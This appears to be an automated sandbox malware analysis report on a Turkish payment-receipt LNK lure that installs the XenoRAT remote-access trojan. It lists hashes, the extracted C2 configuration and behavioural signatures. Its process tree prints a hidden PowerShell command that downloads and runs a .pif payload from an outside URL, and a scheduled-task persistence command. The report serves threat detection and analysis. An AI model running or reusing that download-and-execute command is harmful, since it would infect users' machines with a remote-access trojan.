Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
max time kernel: 149s
max time network: 151s
platform: windows7_x64
resource: win7-20240221-en
resource tags: arch:x64 arch:x86 image:win7-20240221-en locale:en-us os:windows7-x64 system
submitted: 03/05/2024, 13:00
Static task: static1
Behavioral task: behavioral1
Sample: Dekontu/Odeme -(Mayis).lnk
Resource: win7-20240221-en
General
Target: Dekontu/Odeme -(Mayis).lnk
Size: 2KB
MD5: 2ad899ef7b0d361186d8487950b7e167
SHA1: 151d04d656e68152cc2116b0837331a7df30eb27
SHA256: 2ebd9ab34d58f221ce2034b9f43ad8b128fbc683dab962fbf6222b4eef2a3618
SHA512: 2a84054d0f22a042eb2390dba4831eea02700334531e09a3e4ce3b7ca0db71d12ea7d0de30b19280ac0fe746002f4fc96a4904832c81b3dac6647c4a9a50b39b
Malware Config
Extracted
https://www.dobiamfollollc.online/konzjrngodznhitsthjfxjydtjytddy/uiuGJRSgfzjzdgzdghstRgsgtesht/cfhfcg.pif
Extracted
xenorat
dns.requimacofradian.site
Xeno_rat_nd8818g
delay: 60000
install_path: appdata
port: 1243
startup_name: uic
Signatures
- Blocklisted process makes network request (1 IoCs)
  flow 5, pid 2820, PoWeRShElL.exe
- Command and Scripting Interpreter: PowerShell (1 TTPs, 1 IoCs)
  Run Powershell and hide display window.
  pid 2820, PoWeRShElL.exe
- Downloads MZ/PE file
- Executes dropped EXE (8 IoCs)
  pid 2444 screenbiwus.pif
  pid 2052 screenbiwus.pif
  pid 1600 screenbiwus.pif
  pid 2776 screenbiwus.pif
  pid 2064 screenbiwus.pif
  pid 1512 screenbiwus.pif
  pid 2256 screenbiwus.pif
  pid 1624 screenbiwus.pif
- Loads dropped DLL (4 IoCs)
  pid 2444 screenbiwus.pif (3 entries)
  pid 1600 screenbiwus.pif
- Suspicious use of SetThreadContext (6 IoCs)
  PID 2444 set thread context of 2052 (pid 2444 screenbiwus.pif, procid_target 31)
  PID 2444 set thread context of 1600 (pid 2444 screenbiwus.pif, procid_target 32)
  PID 2444 set thread context of 2776 (pid 2444 screenbiwus.pif, procid_target 33)
  PID 2064 set thread context of 1512 (pid 2064 screenbiwus.pif, procid_target 35)
  PID 2064 set thread context of 2256 (pid 2064 screenbiwus.pif, procid_target 36)
  PID 2064 set thread context of 1624 (pid 2064 screenbiwus.pif, procid_target 37)
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).
- Creates scheduled task(s) (1 TTPs, 1 IoCs)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
  pid 748, schtasks.exe
- Suspicious behavior: EnumeratesProcesses (64 IoCs)
  pid 2820 PoWeRShElL.exe
  pid 2052 screenbiwus.pif (63 identical entries)
- Suspicious use of AdjustPrivilegeToken (4 IoCs)
  Token: SeDebugPrivilege, pid 2820 PoWeRShElL.exe
  Token: SeDebugPrivilege, pid 2444 screenbiwus.pif
  Token: SeDebugPrivilege, pid 2064 screenbiwus.pif
  Token: SeDebugPrivilege, pid 2052 screenbiwus.pif
- Suspicious use of WriteProcessMemory (64 IoCs)
  PID 2232 wrote to memory of 2820 (pid 2232 cmd.exe, procid_target 29; 3 entries)
  PID 2820 wrote to memory of 2444 (pid 2820 PoWeRShElL.exe, procid_target 30; 4 entries)
  PID 2444 wrote to memory of 2052 (pid 2444 screenbiwus.pif, procid_target 31; 9 entries)
  PID 2444 wrote to memory of 1600 (pid 2444 screenbiwus.pif, procid_target 32; 9 entries)
  PID 2444 wrote to memory of 2776 (pid 2444 screenbiwus.pif, procid_target 33; 9 entries)
  PID 1600 wrote to memory of 2064 (pid 1600 screenbiwus.pif, procid_target 34; 4 entries)
  PID 2064 wrote to memory of 1512 (pid 2064 screenbiwus.pif, procid_target 35; 9 entries)
  PID 2064 wrote to memory of 2256 (pid 2064 screenbiwus.pif, procid_target 36; 9 entries)
  PID 2064 wrote to memory of 1624 (pid 2064 screenbiwus.pif, procid_target 37; 8 entries)
Processes
- C:\Windows\system32\cmd.exe (PID 2232)
  Command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\Dekontu\Odeme -(Mayis).lnk"
  Signatures: Suspicious use of WriteProcessMemory
  - C:\Windows\System32\WindowsPowerShell\v1.0\PoWeRShElL.exe (PID 2820)
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\PoWeRShElL.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command srms-apr.dat;(new-object System.Net.WebClient).DownloadFile('https://www.dobiamfollollc.online/konzjrngodznhitsthjfxjydtjytddy/uiuGJRSgfzjzdgzdghstRgsgtesht/cfhfcg.pif','screenbiwus.pif');./'screenbiwus.pif';(get-item 'screenbiwus.pif').Attributes += 'Hidden';
    Signatures: Blocklisted process makes network request; Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
    - C:\Users\Admin\AppData\Local\Temp\Dekontu\screenbiwus.pif (PID 2444)
      Command line: "C:\Users\Admin\AppData\Local\Temp\Dekontu\screenbiwus.pif"
      Signatures: Executes dropped EXE; Loads dropped DLL; Suspicious use of SetThreadContext; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
      - C:\Users\Admin\AppData\Local\Temp\Dekontu\screenbiwus.pif (PID 2052)
        Command line: C:\Users\Admin\AppData\Local\Temp\Dekontu\screenbiwus.pif
        Signatures: Executes dropped EXE; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
        - C:\Windows\SysWOW64\schtasks.exe (PID 748)
          Command line: "schtasks.exe" /Create /TN "uic" /XML "C:\Users\Admin\AppData\Local\Temp\tmp1D02.tmp" /F
          Signatures: Creates scheduled task(s)
      - C:\Users\Admin\AppData\Local\Temp\Dekontu\screenbiwus.pif (PID 1600)
        Command line: C:\Users\Admin\AppData\Local\Temp\Dekontu\screenbiwus.pif
        Signatures: Executes dropped EXE; Loads dropped DLL; Suspicious use of WriteProcessMemory
        - C:\Users\Admin\AppData\Roaming\XenoManager\screenbiwus.pif (PID 2064)
          Command line: "C:\Users\Admin\AppData\Roaming\XenoManager\screenbiwus.pif"
          Signatures: Executes dropped EXE; Suspicious use of SetThreadContext; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
          - C:\Users\Admin\AppData\Roaming\XenoManager\screenbiwus.pif (PID 1512)
            Command line: C:\Users\Admin\AppData\Roaming\XenoManager\screenbiwus.pif
            Signatures: Executes dropped EXE
          - C:\Users\Admin\AppData\Roaming\XenoManager\screenbiwus.pif (PID 2256)
            Command line: C:\Users\Admin\AppData\Roaming\XenoManager\screenbiwus.pif
            Signatures: Executes dropped EXE
          - C:\Users\Admin\AppData\Roaming\XenoManager\screenbiwus.pif (PID 1624)
            Command line: C:\Users\Admin\AppData\Roaming\XenoManager\screenbiwus.pif
            Signatures: Executes dropped EXE
      - C:\Users\Admin\AppData\Local\Temp\Dekontu\screenbiwus.pif (PID 2776)
        Command line: C:\Users\Admin\AppData\Local\Temp\Dekontu\screenbiwus.pif
        Signatures: Executes dropped EXE
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 243KB
  MD5: f6839c83a19cfb9112997be29ba02a88
  SHA1: b558ada6c8f1603b8c700a74afc33bfbb14ac713
  SHA256: 09d6f45a4cf61b2eaf9b715c712d6e61410a7d838b71e31fa4b12c012afb2d90
  SHA512: 0724132c9cbdd1394cc3e17d557c7c82b8e30b34b1adc207f7b77dc498b63e5c03768de88b261bd986cfe18ab8a70ff77c4dabc5b215d58a959287c7f38fdd8b
- Filesize: 1KB
  MD5: cd6994537023694f4533ff4244156d8a
  SHA1: b581d11e2cad75bd5b7e440169f423cb18117a40
  SHA256: b03bd499a8ab96f583f7029110764a3a08ecd976f4e2ec9e7b74c414d20c6707
  SHA512: f9d3f71138a6af0d0435d3b66b7277a92696050dc3f3fdfb2842f02d8bf2a948342101da4747e74d003c23dd13799d4940496043fad866b9bc2045de54ea9cd0